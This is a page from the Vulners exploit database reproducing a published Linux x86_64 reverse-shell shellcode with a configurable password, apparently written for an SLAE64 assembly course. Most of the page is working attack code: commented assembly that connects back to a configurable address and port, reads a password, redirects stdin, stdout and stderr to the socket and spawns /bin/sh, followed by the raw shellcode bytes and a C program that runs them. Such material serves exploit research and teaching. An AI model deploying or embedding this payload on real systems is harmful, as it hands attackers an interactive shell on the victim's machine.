Vulners
Lucene search
Linux/x86_64 - Reverse Shell (/bin/sh) with Configurable Password Shellcode (120 bytes)
/*
; Title : Linux/x86_64 - Reverse Shell (/bin/sh) with Password (configurable) (120 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635
global _start
%define pass "pass"
%define port 0x5c11 ; htons(4444)
_start:
jmp real_start
password: db pass
pass_len: db $-password
real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall
push rax
pop rdi
connect:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = inet_addr("127.0.0.1"); unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; connect(sock, (struct sockaddr *)&server, sockaddr_len)
; AF_INET = 2
; __NR_connect = 42
; On success, zero is returned
xor eax, eax
push rax ; sin_zero
push 0x10ffff70 ; sin_addr (xored)
xor dword [rsp], 0x11ffff0f ; recover sin_addr
push word port
push word 2
; connect
add al, 42
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)
syscall
dup2:
; dup2(sock, 0);
; dup2(sock, 1);
; dup2(sock, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor
push 2
pop rsi
dup2_loop:
mov al, 33
syscall
dec esi
jns dup2_loop
read_password:
; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned
;xor eax, eax ; already done by dup2
;rdi = "sock" ; already done
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16
syscall
compare_password:
xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx
cld
repz cmpsb
jne exit
execve:
; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00
xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00
mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh
push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)
mov al, 59
syscall
exit:
;xor eax, eax ; upper bytes are zero after read
mov al, 60
syscall
*/
#include <stdio.h>
#include <string.h>
char code[] =
"\xeb\x05\x70\x61\x73\x73\x04\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f"
"\x05\x50\x5f\x31\xc0\x50\x68\x70\xff\xff\x10\x81\x34\x24\x0f\xff\xff\x11"
"\x66\x68\x11\x5c\x66\x6a\x02\x04\x2a\x54\x5e\x80\xc2\x10\x0f\x05\x6a\x02"
"\x5e\xb0\x21\x0f\x05\xff\xce\x79\xf8\x50\x50\x54\x5e\xb2\x10\x0f\x05\x31"
"\xc9\x48\x8d\x3d\xb6\xff\xff\xff\x8a\x0f\x48\x29\xcf\xfc\xf3\xa6\x75\x1a"
"\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f"
"\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0\x3c\x0f\x05";
int main() {
printf("length: %lu\n", strlen(code));
((int(*)()) code)();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Aug 2019 00:00Current
0.2Low risk
Vulners AI Score0.2